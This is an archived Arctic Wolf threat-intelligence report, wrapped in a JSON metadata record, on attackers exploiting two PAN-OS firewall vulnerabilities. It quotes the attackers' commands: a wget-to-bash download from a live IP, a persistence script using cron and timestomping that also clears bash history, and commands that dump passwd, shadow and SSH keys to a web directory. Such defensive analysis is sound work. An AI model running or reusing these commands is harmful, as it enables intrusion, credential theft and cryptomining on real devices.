{
	"id": "1a0ea39d-b499-4f84-8a15-d65c7aaafa70",
	"created_at": "2026-04-06T00:22:25.138194Z",
	"updated_at": "2026-04-10T13:12:58.600246Z",
	"deleted_at": null,
	"sha1_hash": "c937bf3704b9970e8f08ffc5171e8c151e9f4a54",
	"title": "Arctic Wolf Observes Threat Campaign Targeting Palo Alto Networks Firewall Devices - Arctic Wolf",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 242074,
	"plain_text": "Arctic Wolf Observes Threat Campaign Targeting Palo Alto\r\nNetworks Firewall Devices - Arctic Wolf\r\nBy Julian Tuin, Stefan Hostetler, Jon Grimm, Aaron Diaz, and Trevor Daher\r\nPublished: 2024-11-22 · Archived: 2026-04-05 17:37:18 UTC\r\nKey Takeaways\r\nArctic Wolf has observed multiple intrusions across a variety of industries involving Palo Alto Networks\r\nfirewall devices.\r\nAffected devices triggered downloads over HTTP including the Sliver C2 framework, coinminer binaries,\r\nand various other payloads.\r\nEvidence suggests that threat actors exploited the recently disclosed PAN-OS vulnerabilities CVE-2024-0012\r\nand CVE-2024-9474 to gain initial access.\r\nMonitoring firewall logs for usernames with unusual characters provides an opportunity for early kill chain\r\ndetection.\r\nSummary\r\nOn November 18, 2024, Palo Alto Networks disclosed the existence of two vulnerabilities (CVE-2024-0012 and\r\nCVE-2024-9474) in Palo Alto Networks OS (PAN-OS), the operating system used on their firewall devices. A day\r\nlater, watchTowr released a report providing technical details on how to chain the two vulnerabilities together to\r\nachieve remote code execution. While they did not publish a proof-of-concept exploit, the\r\ndetails provided were sufficient to understand the exploitation process.\r\nSeveral hours after the watchTowr report was published, Arctic Wolf Labs began to observe multiple intrusions\r\naffecting Palo Alto Networks devices. Based on the close timing of the watchTowr disclosure and additional\r\nevidence reviewed by Arctic Wolf Labs, we assess with moderate confidence that these intrusions likely involved the\r\nexploitation of CVE-2024-0012 chained together with CVE-2024-9474 for initial access.\r\nWe are sharing details of these intrusions to help organizations defend against these threats. 
Please note that we may\r\nadd further detail to this article as we uncover additional information in our ongoing investigation.\r\nWhat We Know About the Intrusions\r\nExploitation Details\r\nHistorically, threat actors have shown an interest in rapidly weaponizing newly disclosed vulnerabilities, especially\r\nfor perimeter devices such as firewalls and VPN gateways. When the CVE-2024-3400 RCE vulnerability in PAN-OS was disclosed in April 2024 with a subsequent watchTowr technical writeup, threat actors were quick to begin\r\nmass exploitation using the available technical details.\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 1 of 9\n\nWith the disclosure of CVE-2024-0012/CVE-2024-9474, we observe a similar pattern of threat activity targeting\r\nPAN devices immediately following the publication of relevant technical details. As described in the most recent\r\nwatchTowr article, a username field can be abused for the injection of arbitrary commands. This aligns with firewall\r\nlog lines that we observed showing a Panorama console login where the username field includes a bash command\r\nenclosed in backticks:\r\n1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,in\r\nNotably, some files observed during this stage of the attack referenced watchTowr and CVE-2024-9474.\r\nwatchTowr.js\r\nwatchTowr.php\r\nwatchTowr.txt\r\nCVE20249474.php\r\nCommand and Control\r\nArctic Wolf Labs observed several similar indicators of compromise in the most recent intrusions to what was seen\r\nwith CVE-2024-3400. For example, as seen in the example command below, a common pattern is for threat actors to\r\nuse curl or wget on compromised devices to download malicious payloads with IPv4 addresses in the URLs instead\r\nof domain names.\r\nSeveral commands were observed in the most recent intrusions that indicated potential ingress tool transfer. 
One\r\nnotable example is an instance where Sliver C2, an open-source alternative to the commonly used\r\nCobalt Strike penetration testing tool, was retrieved.\r\nwget --no-check-certificate -qO- https://104.131.69.106/vicidial/vicidial_sign.js|bash\r\nThe script (vicidial_sign.js), shown below, has several key functions:\r\nCurl is used to download a JavaScript file (up.js) from the 104.131.69[.]106 IP address and save it as\r\n/usr/lib/e_nas. If curl fails, it attempts to use wget instead.\r\nThe touch command is used to change the modification and access timestamps of the /usr/lib/e_nas file\r\nto match those of /usr/lib/php.ini, likely to hide the recent modification to the file.\r\nAny existing content in the /etc/cron.hourly/telemetry.cron file is cleared out, and a script is written to the\r\nsame path.\r\nThe script then checks if a process named cloud-lib is running (pgrep -x cloud-lib), and if not, it copies\r\n/usr/lib/e_nas to /usr/bin/cloud-lib, sets its permissions to executable only by the owner (chmod\r\n700), and then runs it in the background.\r\nThe permissions of /etc/cron.hourly/telemetry.cron are changed to 755, allowing it to be executed.\r\nThe touch command is used again to modify the timestamps of /etc/cron.hourly/telemetry.cron to match\r\n/etc/cron.hourly/logrotate_hourly, again likely to hide the modification to the file.\r\nBash history is cleared to avoid evidence of the commands having been executed.\r\n#!/bin/bash\r\ncurl -k https://104.131.69.106/vicidial/up.js -o /usr/lib/e_nas || wget --no-check-certificate https://\r\ntouch -r /usr/lib/php.ini /usr/lib/e_nas\r\necho '' \u003e /etc/cron.hourly/telemetry.cron\r\necho '#!/bin/sh' \u003e /etc/cron.hourly/telemetry.cron\r\necho \"bash -c 'if ! 
pgrep -x cloud-lib; then cp /usr/lib/e_nas /usr/bin/cloud-lib \u0026\u0026 chmod 700 /usr/bi\r\nchmod 755 /etc/cron.hourly/telemetry.cron\r\ntouch -r /etc/cron.hourly/logrotate_hourly /etc/cron.hourly/telemetry.cron\r\necho \"\" \u003e /root/.bash_history\r\nThe file (up.js) outlined in the section above is a UPX-packed Sliver payload.\r\nData Exfiltration\r\nIn observed intrusions, threat actors issued multiple data staging and exfiltration commands to retrieve sensitive\r\ninformation from firewall devices. Most of the exfiltrated data consisted of firewall configuration files, which are known to\r\ncontain hashed credentials. Additionally, some attempts were made to exfiltrate the operating system passwd and\r\nshadow files.\r\nHere is a selection of injected commands involving attempts to exfiltrate credentials and PAN configuration files:\r\ncat /root/.ssh/authorized_keys \u003e /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’\r\ncat /etc/networks \u003e /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’\r\narp -a \u003e /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’\r\ncat /etc/passwd \u003e /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’\r\ncat /etc/shadow \u003e /var/appweb/htdocs/unauth/watchTowr.txt’\r\nIn some instances, threat actors archived the staged output using the tar command:\r\ntar -zcvf /tmp/f03.png /opt/pancfg/mgmt/saved-configs\r\nPHP Webshell\r\nOne of the payloads deployed was an obfuscated PHP webshell. The key functions are as follows:\r\n1. When an HTTP request is made, the webshell monitors for the use of an obfuscated POST parameter called\r\n$oNvPH071PRH, which is a base64-encoded and XOR-encrypted string.\r\n2. Upon decryption of that POST parameter, the webshell looks for a provided payload parameter, which it\r\nproceeds to execute through the PHP eval function.\r\n3. 
The output is base64-encoded and XOR-encrypted, then wrapped with a header consisting of the first 8 bytes\r\nof the MD5 hash of 18f566d952acaa29 and a footer consisting of the last 8 bytes of the same hash.\r\nCoinminer Activity\r\nSome cases involved the deployment of XMRig on compromised firewall devices.\r\nShortly after the retrieval and execution of the file, network traffic reaching out to known XMRig IP addresses was\r\nobserved.\r\n{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"49VQVgmN9vYccj2tEgD7qgJPbLiGQcQ4uJxTRkTJUCZ\r\nHow Arctic Wolf Protects its Customers\r\nArctic Wolf is committed to ending cyber risk with its customers, and when active ransomware campaigns are\r\nidentified we move quickly to protect our customers.\r\nArctic Wolf Labs has leveraged threat intelligence around the exploitation of Palo Alto Networks devices to\r\nimplement new detections in the Arctic Wolf Platform to protect Managed Detection and Response (MDR)\r\ncustomers. As we discover any new information, we will enhance our detections to account for additional indicators\r\nof compromise and techniques leveraged by this threat actor.\r\nRemediation\r\nFor more details on recommended actions to address these vulnerabilities, see our security bulletin here.\r\nConclusion\r\nThreat actors don’t wait around once new vulnerabilities are disclosed, especially for perimeter devices such as\r\nfirewalls and VPN gateways. Across different campaigns and vulnerabilities, similar patterns emerge that help\r\ndefenders react early in the kill chain.\r\nThe activities we’ve highlighted here are only scratching the surface. 
In this campaign, we’ve observed exfiltration\r\nof device configurations and credentials, along with the deployment of various payloads including coinminers,\r\nbotnet malware, PHP webshells, and C2 frameworks. These observations illustrate the many ways that opportunistic\r\nthreat actors attempt to leverage these vulnerabilities, for financial gain and otherwise.\r\nDefenders should implement robust external monitoring and alerting for perimeter devices. In particular, close\r\nattention should be paid to unusual HTTP activity on such devices as it emerges. Additionally, as recommended by\r\nPalo Alto Networks, management interfaces of firewalls should not be exposed on the public internet, and should be\r\nrestricted to only trusted internal IP addresses.\r\nAcknowledgements\r\nArctic Wolf Labs acknowledges the work of Ishmael Guarin, Gagan Sahota, Jordan Bourcier, Phillip Kaiser, and\r\nAbdo Elhemaily on the Arctic Wolf Security Services team for identifying the mass exploitation campaign described\r\nin this article and identifying command injection in PAN firewall logs.\r\nAppendix\r\nTactics, Techniques, and Procedures (TTPs)\r\nTactic | Technique | Sub-techniques or Tools\r\nInitial Access | T1190: Exploit Public-Facing Application | Exploited CVE-2024-0012 to gain administrator access to the management web interface of devices running PAN-OS software\r\nPrivilege Escalation | T1068: Exploitation for Privilege Escalation | Exploited CVE-2024-9474 to elevate privileges to root on devices running PAN-OS software\r\nDefense Evasion | T1027: Obfuscated Files or Information | Obfuscated multiple scripts and malicious payloads\r\nDefense Evasion | T1070.003: Indicator Removal: Clear Command History | Cleared bash history\r\nDefense Evasion | T1070.006: Indicator Removal: Timestomp | Used the touch command to modify file timestamps\r\nCredential Access | T1003.008: OS Credential Dumping: /etc/passwd and /etc/shadow | Used the cat command to output the contents of passwd and shadow\r\nCollection | T1560: Archive Collected Data | Used the tar command to archive staged data\r\nCollection | T1119: Automated Collection | Automatically collected firewall configuration information\r\nCollection | T1074.001: Local Data Staging | Wrote sensitive information to randomly named files in a specific directory before bundling them together for exfiltration\r\nCommand and Control | T1105: Ingress Tool Transfer | Used wget and curl to retrieve files from C2 addresses\r\nImpact | T1496.001: Compute Hijacking | Deployed the XMRig coinminer to mine cryptocurrency using the device resources\r\nTools\r\nName | Description\r\nXMRig | A tool used to leverage host resources to mine cryptocurrencies such as XMR.\r\nSliver C2 | Penetration testing framework. 
An open-source alternative to another known penetration testing framework, Cobalt Strike.\r\nVulnerabilities Exploited\r\nVulnerability | Use\r\nCVE-2024-0012 (CVSS: 9.8) | Authentication bypass vulnerability in Palo Alto Networks PAN-OS software that allows an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges.\r\nCVE-2024-9474 (CVSS: 7.2) | Privilege escalation vulnerability in Palo Alto Networks PAN-OS software that allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.\r\nIndicators of Compromise (IoCs)\r\nThe indicator table (IPv4 addresses, URLs, a domain, and the SHA256 hash of the Sliver payload, each labelled by type and role) is available in the source article.\r\nDetection Opportunities\r\nAs part of our Managed Detection and Response service, Arctic Wolf has detections in place for techniques\r\ndescribed in this blog article, in addition to other techniques employed by threat actors described here.\r\nFirewall\r\nCommand injection used in exploitation of CVE-2024-9474 can be detected through bash commands in the\r\nusername field of log lines involving Panorama console logins. In general, if a username contains unusual\r\ncharacters, it should be treated as suspicious.\r\n1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,in\r\nNetwork\r\nOn firewall devices, files downloaded over HTTP from URLs with IPv4 addresses should be considered suspicious\r\nwhen not originating from the vendor or another expected source such as a block list provider.\r\nAdditional Resources\r\nGet actionable insights and access to the security operations expertise of one of the largest security operations\r\ncenters (SOCs) in the world in Arctic Wolf’s 2024 Security Operations Report.\r\nLearn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000\r\nglobal IT and security leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.\r\nAbout Arctic Wolf Labs\r\nArctic Wolf is a group of elite security researchers, data scientists, and security development engineers who explore\r\nsecurity topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine 
advanced\r\nthreat detection models with artificial intelligence, including machine learning, and drive continuous improvement in\r\nthe speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. With their deep domain knowledge,\r\nArctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security\r\ncommunity at large.\r\nAuthors\r\nJulian Tuin\r\nJulian is a Senior Threat Intelligence Researcher at Arctic Wolf Labs with more than 6 years of industry experience.\r\nHe has experience in identifying and tracking campaigns for new and emerging threats.\r\nStefan Hostetler\r\nStefan is a Lead Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his\r\nbelt, he focuses on extracting actionable insight from novel threats to help organizations protect themselves\r\neffectively.\r\nJon Grimm\r\nJon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing\r\nactionable intelligence that enhances organizational defenses. He has a background of 10 years’ experience in several\r\ndomains of cybersecurity, holds a bachelor’s degree in law enforcement, and holds several industry certifications\r\n(CISSP, GCFA, GCTI).\r\nAaron Diaz\r\nAaron is a Lead Security Researcher at Arctic Wolf Labs focusing on malware analysis and detection research. He\r\nhas more than 8 years of experience in the industry with a background in threat hunting, malware\r\nanalysis/development and vulnerability research. 
Aaron has a passion for novel threat research and adversary\r\ntradecraft.\r\nTrevor Daher\r\nTrevor Daher is a Technical Lead within Arctic Wolf’s Security Services group supporting the Managed Detection\r\nand Response (MDR) service.\r\nSource: https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/"
	],
	"report_names": [
		"arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434945,
	"ts_updated_at": 1775826778,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c937bf3704b9970e8f08ffc5171e8c151e9f4a54.pdf",
		"text": "https://archive.orkl.eu/c937bf3704b9970e8f08ffc5171e8c151e9f4a54.txt",
		"img": "https://archive.orkl.eu/c937bf3704b9970e8f08ffc5171e8c151e9f4a54.jpg"
	}
}